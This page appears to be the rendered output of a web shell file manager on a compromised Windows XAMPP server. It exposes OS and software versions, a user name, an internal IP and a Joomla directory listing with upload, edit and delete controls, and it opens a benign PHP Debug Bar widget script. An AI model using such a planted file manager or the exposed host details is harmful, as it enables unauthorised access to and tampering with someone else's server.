[ SYSTEM ]: Windows NT SWD-ELEARN-11 10.0 build 20348 (Windows Server 2016) AMD64
[ SERVER ]: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.3.9 | PHP: 7.3.9
[ USER ]: Elearn | IP: 10.201.204.156
GEFORCE FILE MANAGER
/
C:
/
xampp
/
htdocs
/
Ajaji
/
media
/
plg_system_debug
/
widgets
/
languageFiles
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📄 widget.css
591 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget.js
1,980 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget.min.css
507 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget.min.css.gz
256 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget.min.js
825 B
SET
[ EDIT ]
|
[ DEL ]
📄 widget.min.js.gz
418 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: widget.min.js
(function(e){var l=PhpDebugBar.utils.makecsscls("phpdebugbar-widgets-"),h=PhpDebugBar.Widgets.languageFilesWidget=PhpDebugBar.Widget.extend({tagName:"table",className:l("languageFiles"),render:function(){this.bindAttr("data",function(a){this.$el.empty();var s=e("<tr />").append(e("<th />").text("Extension")).append(e("<th />").text("File"));this.$el.append(s);for(var r in a.loaded){var p=e("<ul />");for(var t in a.loaded[r]){var g=a.loaded[r][t]?"alert-success":"alert-warning",i=a.loaded[r][t]?"+":"-",n=i+" "+t.replace(a.jroot,""),d=e("<li />").addClass(g);if(a.xdebugLink){var u=e("<a />").text(n).attr("href",a.xdebugLink.replace("%f",t).replace("%l","1"));d.append(u)}else d.text(n);d.appendTo(p)}var c=e("<tr />").append(e("<td />").text(r)).append(e("<td />").append(p));this.$el.append(c)}})}})})(PhpDebugBar.$);